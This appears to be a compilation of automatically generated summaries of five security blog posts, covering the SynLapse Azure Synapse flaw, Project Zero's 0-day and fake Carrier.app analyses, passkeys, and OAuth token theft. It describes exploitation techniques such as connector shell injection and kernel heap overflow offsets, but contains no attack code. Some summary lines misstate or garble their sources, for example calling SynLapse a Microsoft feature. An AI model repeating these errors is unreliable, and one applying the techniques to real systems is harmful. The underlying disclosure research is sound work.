SynLapse: Azure Synapse Analytics Service Vulnerability - Orca Security 1
This blog describes the technical details of SynLapse, a feature that Microsoft has implemented to improve tenant isolation.
Tzah Pahima discovered SynLapse, a vulnerability in Microsoft Azure Synapse Analytics that allowed attackers to bypass tenant separation and obtain credentials to other Azure Synapse customer accounts.
Microsoft took over 100 days to fix a vulnerability in Synapse, after which Orca Security was awarded $60,000 for our discovery. Orca Security was able to bypass the initial patch, and Microsoft finally revoked the certificate to the internal control server.
SynLapse enabled attackers to access Synapse resources belonging to other customers via an internal Azure API server managing the integration runtimes. They could also run remote code on any customer's integration runtimes.
A shell injection vulnerability was found in the Magnitude Simba Redshift ODBC connector used by Microsoft's software, which leads to an RCE.
Integration runtimes are Windows machines that connect to external sources and process data. Self-hosted IRs are dedicated to a single customer by design, and Azure IRs are shared by multiple customers.
When attempting to connect to an Azure database using ODBC, Synapse won't allow you to choose an Azure-hosted runtime.
So now we have an RCE on a shared Synapse integration runtime owned by Azure, but the machine shouldn't have any special privileges.
We found credentials and tokens belonging to multiple companies in the memory of the TaskExecutor.exe process.
The shared integration runtime contained a client certificate used for authentication in front of an internal management server. The management server's API permitted querying integration runtimes and other workspaces, as well as obtaining of Synapse workspace (managed) identities belonging to other customer accounts.
A security flaw in the shared integration runtime exposed a client certificate to a powerful, internal API server, enabling an attacker to compromise the service and access other customers' resources.
Microsoft blocked MicrosoftAccess and GenericOdbcConnector, but left GenericOdbcPartition open, which leads to an ODBC connection being created.
ConnectionString contains the following properties: Driver, Server, Database, Port, Username, SSLMode, SingleRowMode, KeepAliveTime, ValidateConnectionString, and ConnectionString.return.
Every connector implements a function called BuildConnectionString which is generally secure, and is normal .NET API.
If the ConnectionSettings object is null or empty, then new ConnectionSettings is created and the ConnectionString is returned.
The Salesforce connector uses a property called "extendedProperties" which is an ODBC string (converted to a dictionary) containing keys and values. The Salesforce connector assigns the values of this property to the main ODBC connection string.
MSRC was patching and mitigating vulnerabilities in the Redshift connector, so I tried to exploit other vulnerable connectors, but Microsoft patched the Salesforce connector I was exploiting, so I had to find another way to execute code.
When reporting the issue, we suggested to Microsoft to implement a few mitigations, mainly a sandbox and least privilege access to the management server. Microsoft has implemented all recommendations, and we have removed alerting on Synapse from within the Orca Cloud Security Platform.
Project Zero: 2022 0-day In-the-Wild Exploitation…so far 2
As of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild. At least nine of these 0-days are variants of previously patched vulnerabilities, and at least half of these 0-days could have been prevented with more comprehensive patching and regression tests.
Many of the 2022 in-the-wild 0-day exploits are due to the previous vulnerability not being fully patched. In the case of the Windows win32k and the Chromium property access interceptor bugs, the root cause issue was not addressed.
When 0-day exploits are detected in-the-wild, it's a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can't be used again. To do that effectively, we need correct and comprehensive fixes.
Root cause analysis helps to understand how a vulnerability was introduced, and helps to ensure that a fix addresses the vulnerability.
Researchers often find more than one vulnerability at the same time by looking for similar bug patterns elsewhere, more thoroughly auditing the component that contained the vulnerability, etc.
Analyzing the proposed patch for completeness compared to the root cause vulnerability is important.
Exploit technique analysis helps vendors and security researchers understand how attackers are using vulnerabilities. By sharing exploit samples, the industry as a whole will benefit and developers will be able to create better solutions.
Project Zero: The curious tale of a fake Carrier.app 3
A fake My Vodafone carrier app was sideloaded onto a target's iPhone using the Apple Enterprise developer program, which allows companies to push "trusted apps" to their staff's iOS devices bypassing Apple's App Store review process.
The app is broken up into multiple frameworks, including a privilege escalation exploit wrapper and an agent that can exfiltrate files from the device.
Five of the exploits shared a common high-level structure, including manipulating the kernel heap to control object placement, triggering a kernel vulnerability, and turning that into something useful. The sixth exploit didn't have anything like that.
The Display Co-Processor (DCP) is a processor that ships with iPhone 12 and above and all M1 Macs.
Apple added a coprocessor to the display engine, which runs its own firmware. They moved most of the display driver into the coprocessor, and created a remote procedure call interface.
Before diving into DCP internals it's worth stepping back a little to understand what a co-processor is and what might the consequences of compromising it be.
SystemPlus performs thorough analysis of these dies, and the DCP is likely the rectangular region indicated. It takes up around the same amount of space as the four high-efficiency cores seen in the centre.
The DCP firmware image is a .zip archive that contains all the firmware for the DCP co-processors, modems etc.
Function names make understanding code significantly easier, so I thought perhaps there was a DCP firmware image where the symbols hadn't been stripped, but every single one was stripped.
The exploit calls 3 different external method selectors on the AppleCLCD2 user client, the largest of which corresponds to this user client method in the kernel driver.
UnifiedPipeline2::rpc calls DCPLink::rpc, which calls AppleDCPLinkService::rpc, which calls rpc_caller_gated to allocate space in a shared memory buffer, copy the message into the buffer, and signal to the DCP that a message is available.
The DCP's rpc_callee_gated function unpacks the wire format and maps all the 4-letter RPC codes to function pointers.
The challenge here is to figure out where a virtual call goes. We can't just set a breakpoint, so we have to decompile all the vtables and see if the prototypes look reasonable.
The exploit calls a method twice, passing two different values for first_scalar_input, 7 and 19. These correspond to looking up two different block handler objects.
It's possible to control bytes in the setBlock_Impl functions by passing a different value for the first scalar argument to IOConnectCallMethod 78.
The raw "block" input to each of those setBlock_Impl methods isn't passed inline in the IOConnectCallMethod structure input, but rather via an array of supported "subtypes" that contain metadata.
The DCP requests a memory mapping from a user task, and the AP sends back the raw task struct pointers so that the kernel can perform the mapping from the correct task.
The exploit calls two setBlock_Impl methods, 7 and 19. 7 is fairly simple and puts controlled data in a known location, 19 is buggy and sets and gets a data structure containing correction information.
The structure of the code makes it look like the compensator->inline_buffer buffer is 0xc000 (three 16k pages large). We need to find the allocation site of this compensator object to verify this.
The inner loop increments the destination pointer by 0x100 each iteration, and the outer loop writes to three subsequent 0x4000 byte blocks. The third iteration writes 0x4618 bytes, overflowing the allocation size by 0x34 bytes.
The input buffer is fully consumed with no "rewinding" so 0xe5b0 bytes are consumed. The first byte to corrupt an object is 0xe57c.
The trail goes cold here, and we can't fully recreate the rest of the exploit. But based on the flow of the rest of the exploit it's pretty clear what happens next.
The DCP makes RPC calls to the AP to access memory, and the DCP exploit uses this interface to read an
ImperialViolet - Passkeys 4
Google is making a push to take WebAuthn to the masses, replacing security keys with phones and backing up the private keys themselves. The WebAuthn spec is not a gentle introduction, but you can find several guides on how to make the API calls.
Security keys, laptops, phones, and Windows Hello are all examples of authenticators. Authenticators maintain a map of the user's credentials.
A website's RP ID is a string that contains a domain name. It can use any RP ID that is at least an eTLD + 1 and not com or example.org.
The spec says that a user ID mustn't contain identifiable information, so you should generate a large random value on demand and store it in a column in your users table.
An authenticator maps (RP ID, user ID) pairs to credentials, and a site can have only one credential per account.
A credential is a collection of various fields, including a private key, metadata, and user information. The user name, display name, and ID are the three pieces of user information.
A passkey is a WebAuthn credential that is safe and available when the user needs it, i.e. backed up.
The structure of things is that an account only has a single password, but it can have multiple passkeys. Users will register a passkey as needed to cover their set of devices.
When there are multiple passkeys registered on a site, users will need to manage them. Usually, sites will list them in the user's account settings, and the user will be prompted to name them.
The backup state bit in the authenticator data allows sites to determine when it might be time to ask the user to remove their password. If the backup state bit is set, the passkey will survive the loss of the device.
Account hijacking using "dirty dancing" in sign-in OAuth-flows - Detectify Labs 5
Ten years ago, I was inspired by Nir Goldshlager and Egor Homakov to try to figure out how to steal OAuth tokens.
Combining response-type switching, invalid state and redirect-uri quirks using OAuth with third-party javascript-inclusions has multiple vulnerable scenarios that could lead to account takeovers.
I've been looking for bugs related to postMessage implementations for a long time, and I built a Chrome extension to simplify inspecting all postMessage-listeners for all windows in each tab. I suspected that weak or no origin-checks in postMessage-listeners would leak location.href, which would allow me to steal OAuth tokens.
To start the investigation, I went through all sign-in flows on popular websites that run bug bounties, and saved the sign-in URLs for all providers. I also made note of any interesting postMessage-listeners or any other third-party scripts loaded on the website.
Know what kind of pages are involved in the OAuth-dance, and make sure they do not use any third-party scripts. This will prevent any future potential token leakage.
Acknowledgement
The above summaries are automatically generated by Wordtune.